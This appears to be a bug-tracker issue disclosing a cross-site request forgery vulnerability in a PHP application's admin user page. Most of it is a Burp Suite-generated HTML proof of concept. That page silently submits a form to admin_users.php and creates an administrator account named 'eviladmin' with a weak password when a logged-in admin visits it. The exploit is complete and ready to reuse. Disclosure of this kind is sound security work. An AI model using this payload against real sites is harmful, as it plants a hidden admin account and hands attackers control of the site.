Open
Description
After admin logging in,click the following link,eviladmin will be created with admin's privileges.
PoC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/kli/admin/admin_users.php" method="POST">
<input type="hidden" name="username" value="eviladmin" />
<input type="hidden" name="email" value="a11aa@aa.com" />
<input type="hidden" name="level" value="admin" />
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="mode" value="newuser" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Metadata
Metadata
Assignees
Labels
No labels